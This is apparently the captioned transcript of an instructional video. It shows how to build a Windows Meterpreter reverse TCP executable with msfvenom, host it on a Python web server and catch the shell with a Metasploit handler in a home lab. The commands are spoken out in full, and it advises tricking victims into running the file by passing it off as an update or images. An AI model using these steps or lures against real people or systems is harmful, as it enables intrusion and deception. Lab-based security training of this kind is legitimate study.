Use Msfvenom to Create a Reverse TCP Payload

Video Statistics and Information

Captions
Greetings, I'm Professor K, and in this short video presentation we're going to take a look at how we can use msfvenom to create a reverse TCP payload. A reverse shell, also known as a connect back, is the opposite of a bind shell. It requires the attacker to set up a listener first on the attack machine. The target machine then acts as a client connecting to the listener, and finally the attacker receives the shell.

In this lab demonstration I'll be using one virtual install of Kali Linux, one virtual install of Metasploitable3, and my VirtualBox adapters are set to host-only network. Once you have confirmed that your VirtualBox network adapters are set to host-only adapters, you can then do an IP discovery, starting with your Kali machine, to see the IP address that is currently assigned to your Kali machine. Just open up a terminal and at the prompt you're going to type in ifconfig. Once you have that typed in correctly, go ahead and hit Enter, and the IP address you're going to be looking for is the one that is assigned to your Ethernet 0 adapter. Currently the IP address I have assigned to my Ethernet 0 adapter is 192.168.56.101. This is my IP address; yours may differ.

Once you've discovered the IP address for your Kali machine, move on over to your target machine. Go to Start, and from the Start menu select Command Prompt. At the prompt you're going to type in ipconfig, hit Enter, and the IP address that you want from this output is for the Local Area Connection. My IP address is 192.168.56.103. This is my IP address for my target; your target IP may differ.

To ensure that you have good connectivity between your Kali machine and the target, from your Kali machine bring up a terminal, type in ping, and follow that up with the IP address of your target. Once you have everything typed in correctly, go ahead and hit Enter. To break out of the ping sequence, just go ahead and type in Control-C. We are now ready to continue on with the lab.

From your Kali desktop, right click anywhere, and from the context menu you're going to select Create Folder. You're going to give this folder a user-friendly name. I've called mine shellcodes, all one word. You are free to name your folder as you please. Once you have it named correctly, go ahead and click on the Create button. Once you have that working folder created on your Kali desktop, you're going to right click on it, and from the context menu you're going to select Open Terminal Here.

We're now ready to create our payload using msfvenom. So at my Kali prompt I've typed in msfvenom, give it a space, a dash p, which stands for the payload. This payload is windows forward slash meterpreter forward slash reverse underscore tcp. Give it a space. I now have to type in the local host IP address, which is the IP address for my Kali machine, so at the prompt I've typed in lhost equals 192.168.56.101. Give it a space. I now have to type in the listening port that Kali will be using to receive the connection, so at the prompt I've typed in lport equals 5555. Give it a space. I'm going to be creating a file type of exe, so at the prompt I've typed in dash small letter f, which stands for file type, give it a space, exe. Give it a space, use the greater than sign, which says output the file to a certain location. In this case I've typed in forward slash root forward slash Desktop forward slash the name of my working folder, which is shellcodes, forward slash reverse underscore tcp.exe, which is the name of the file that I'm going to create inside of my working folder. Once you have everything typed in correctly, go ahead and hit Enter. You've got to wait a few seconds for msfvenom to create the payload, so do be patient.

The payload has been created and it has been placed inside of my working folder. We can go ahead and close out this terminal and open up our working folder, and inside my working folder I have the payload, reverse underscore tcp.exe. Go ahead and close out your working folder.

We next have to convince our victim that they need to come to a website and that they need to download this payload because it's important. We can tell them that it's an update, that is a bunch of images that they're going to enjoy. Whatever it is we need to do to get the victim to download this executable, we have to do. So to do this, and make it as easy as possible on myself, I'm going to right click on my working folder, and from the context menu again I'm going to Open Terminal Here. The easiest way for someone to transfer files from a Kali machine up to a target is using a Python 3 simple HTTP server. So at the prompt I've typed in python3 space small letter m space http dot server. Once I have all that typed in correctly, I'm just going to hit Enter, and now I have a web server running inside of my working folder where I have that payload. This HTTP web server is running on port 8000. That is the default port; we don't have to configure a port number unless we want it to run on a different port. For the web server to continue running, you must leave this prompt open. You can minimize it, but do not close it.

We next need to use Metasploit to create a reverse TCP listener. To do this, let's open up a new terminal. At the terminal we're going to type in msfconsole. Once you have that typed in correctly, go ahead and hit Enter. The first thing we have to type in is the exploit that we need to use, so at the prompt I've typed in use space exploit forward slash multi forward slash handler. Go ahead and hit Enter. We next need to assign the correct payload to the exploit, so at the prompt I've typed in set space payload space windows forward slash meterpreter forward slash reverse underscore tcp. Go ahead, hit Enter. I next have to set the local host IP address, which is the IP address from my Kali machine, so at the prompt I've typed in set space lhost space the IP address of my Kali machine, which is 192.168.56.101. This is the IP address for my Kali machine; your IP address may differ. Go ahead, hit Enter. We next need to set the listening port for my Kali machine, so at the prompt I've typed in set space lport space 5555. Hit Enter, and we're now ready to configure the listener for a reverse TCP connection. To do this, I'm going to type in exploit, hit Enter, and I now have a reverse TCP handler waiting for a connection on my Kali machine, listening on port 5555.

Let's bring up our target machine. So as I mentioned earlier, we have to figure out a way to get the exploit over to the victim's machine. It's pretty hard to do this unless we have actual access to the machine or we can convince the victim to assist us. In this case, I'm going to get the victim to go to an IP address for my web server that I have running inside of my working folder. So to do this, I'm going to go to Start and I'm going to open up Internet Explorer. On this first screen that pops up, just click the button that says Ask Me Later, and now in the address bar you're going to type in the following: http colon forward slash forward slash the IP address of your Kali machine, 192.168.56.101, and we have a web server that is running on port 8000. Go ahead and select that, and once you do that, it's going to find whatever is present inside of that working folder, and in this case it found our payload, which is the reverse underscore tcp dot exe. Now all I have to do is get the user to double click it, click Run, and click Run one more time.

Now if we go on back over to my Kali machine, you'll see that we have a meterpreter session. Now that we have established a reverse shell between our Kali machine and our target machine, we can now continue to attack and exploit the machine further. To get a command prompt on my target machine using my meterpreter session, all I have to do is type in shell, hit Enter, and I now have a command prompt as if I was sitting at my target machine.

And so in this short video presentation you got to see how we can use msfvenom to create a reverse TCP payload. I'm Professor K, thanks for watching, and I'll see you in my next video.
Info
Channel: CyberOffense
Views: 34,224
Id: ZqWfDrD2WVY
Length: 9min 30sec (570 seconds)
Published: Sun Apr 17 2022